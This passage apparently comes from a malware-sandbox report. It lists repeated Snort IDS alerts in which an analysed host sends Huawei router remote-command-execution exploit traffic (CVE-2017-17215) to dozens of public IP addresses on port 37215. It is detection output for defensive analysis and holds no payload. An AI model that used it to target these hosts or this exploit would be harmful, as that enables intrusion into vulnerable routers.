                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36374 -> 197.48.219.131:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36374 -> 197.48.219.131:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59972 -> 155.221.192.136:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59972 -> 155.221.192.136:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51442 -> 41.21.217.171:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51442 -> 41.21.217.171:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33816 -> 157.55.227.62:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33816 -> 157.55.227.62:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39522 -> 157.129.24.89:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39522 -> 157.129.24.89:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53364 -> 41.142.55.170:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53364 -> 41.142.55.170:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41334 -> 41.112.53.44:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41334 -> 41.112.53.44:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56802 -> 197.88.18.67:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56802 -> 197.88.18.67:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41166 -> 197.163.62.174:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41166 -> 197.163.62.174:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33960 -> 41.165.208.89:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33960 -> 41.165.208.89:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48746 -> 76.174.76.195:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48746 -> 76.174.76.195:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42306 -> 166.16.190.83:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42306 -> 166.16.190.83:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35846 -> 204.22.161.228:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35846 -> 204.22.161.228:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35376 -> 189.228.237.19:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35376 -> 189.228.237.19:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38296 -> 157.170.165.170:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38296 -> 157.170.165.170:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47002 -> 197.178.185.152:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47002 -> 197.178.185.152:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44544 -> 197.70.47.135:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44544 -> 197.70.47.135:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35626 -> 75.49.195.139:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35626 -> 75.49.195.139:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60312 -> 211.45.136.152:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60312 -> 211.45.136.152:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54158 -> 41.28.13.220:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54158 -> 41.28.13.220:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46428 -> 41.70.140.218:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46428 -> 41.70.140.218:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36174 -> 157.58.89.166:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36174 -> 157.58.89.166:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53906 -> 197.187.231.237:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53906 -> 197.187.231.237:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50818 -> 157.182.246.174:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50818 -> 157.182.246.174:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55242 -> 41.189.66.95:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55242 -> 41.189.66.95:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34140 -> 157.25.209.247:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34140 -> 157.25.209.247:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56228 -> 157.68.215.138:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56228 -> 157.68.215.138:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60218 -> 197.207.102.189:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60218 -> 197.207.102.189:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54158 -> 197.237.152.228:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54158 -> 197.237.152.228:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56364 -> 41.135.32.84:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56364 -> 41.135.32.84:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45960 -> 41.133.29.67:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45960 -> 41.133.29.67:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54782 -> 110.124.171.180:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54782 -> 110.124.171.180:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54542 -> 41.103.45.78:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54542 -> 41.103.45.78:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38446 -> 41.122.250.164:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38446 -> 41.122.250.164:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58160 -> 197.90.229.28:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58160 -> 197.90.229.28:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51958 -> 211.147.140.76:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51958 -> 211.147.140.76:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56980 -> 157.76.189.3:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56980 -> 157.76.189.3:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55246 -> 197.23.105.2:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55246 -> 197.23.105.2:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49320 -> 91.98.242.170:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49320 -> 91.98.242.170:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:37766 -> 141.199.59.173:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:37766 -> 141.199.59.173:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55046 -> 24.82.183.93:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55046 -> 24.82.183.93:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39396 -> 41.248.125.74:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39396 -> 41.248.125.74:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46556 -> 152.41.190.171:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46556 -> 152.41.190.171:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57522 -> 197.125.116.0:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57522 -> 197.125.116.0:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51910 -> 197.57.175.45:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51910 -> 197.57.175.45:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56252 -> 120.191.233.247:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56252 -> 120.191.233.247:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42676 -> 41.156.206.214:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42676 -> 41.156.206.214:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49380 -> 41.185.62.167:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49380 -> 41.185.62.167:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43164 -> 41.93.186.26:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43164 -> 41.93.186.26:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:48738 -> 197.38.240.133:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:48738 -> 197.38.240.133:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59950 -> 157.33.158.151:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59950 -> 157.33.158.151:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41858 -> 41.247.46.12:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41858 -> 41.247.46.12:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44846 -> 197.206.89.130:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44846 -> 197.206.89.130:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43574 -> 157.42.169.126:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43574 -> 157.42.169.126:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43878 -> 197.52.105.112:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43878 -> 197.52.105.112:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56582 -> 157.14.174.37:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56582 -> 157.14.174.37:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53612 -> 41.165.255.30:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53612 -> 41.165.255.30:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53782 -> 157.176.218.10:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53782 -> 157.176.218.10:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35856 -> 197.219.134.66:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35856 -> 197.219.134.66:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46084 -> 197.50.11.183:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46084 -> 197.50.11.183:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:53550 -> 157.198.219.2:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:53550 -> 157.198.219.2:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44670 -> 128.4.57.232:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44670 -> 128.4.57.232:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:45300 -> 157.204.130.3:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:45300 -> 157.204.130.3:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34586 -> 155.178.232.143:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34586 -> 155.178.232.143:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33640 -> 197.223.52.137:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33640 -> 197.223.52.137:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57322 -> 176.171.193.242:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57322 -> 176.171.193.242:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43764 -> 41.46.124.193:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43764 -> 41.46.124.193:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33132 -> 157.124.133.127:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33132 -> 157.124.133.127:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58174 -> 138.194.165.219:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58174 -> 138.194.165.219:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54822 -> 157.180.0.116:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54822 -> 157.180.0.116:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46190 -> 157.221.39.140:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46190 -> 157.221.39.140:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41892 -> 125.218.223.230:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41892 -> 125.218.223.230:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49362 -> 185.101.34.75:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49362 -> 185.101.34.75:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56990 -> 197.153.130.241:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56990 -> 197.153.130.241:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59492 -> 157.208.177.172:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59492 -> 157.208.177.172:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39550 -> 157.83.28.229:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39550 -> 157.83.28.229:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:46300 -> 157.14.16.110:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:46300 -> 157.14.16.110:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:58176 -> 41.212.142.21:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:58176 -> 41.212.142.21:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:49430 -> 197.135.151.92:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:49430 -> 197.135.151.92:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:32850 -> 157.183.228.205:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:32850 -> 157.183.228.205:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43320 -> 197.220.34.254:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43320 -> 197.220.34.254:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:57274 -> 92.57.180.103:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:57274 -> 92.57.180.103:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52494 -> 216.204.37.61:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52494 -> 216.204.37.61:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41472 -> 197.237.160.210:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41472 -> 197.237.160.210:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39246 -> 158.245.1.223:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39246 -> 158.245.1.223:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55596 -> 157.248.11.159:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55596 -> 157.248.11.159:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38480 -> 197.148.145.109:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38480 -> 197.148.145.109:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59306 -> 157.155.124.136:37215
                      Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59306 -> 157.155.124.136:37215
                      Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59976 -> 121.209.116.212:37215
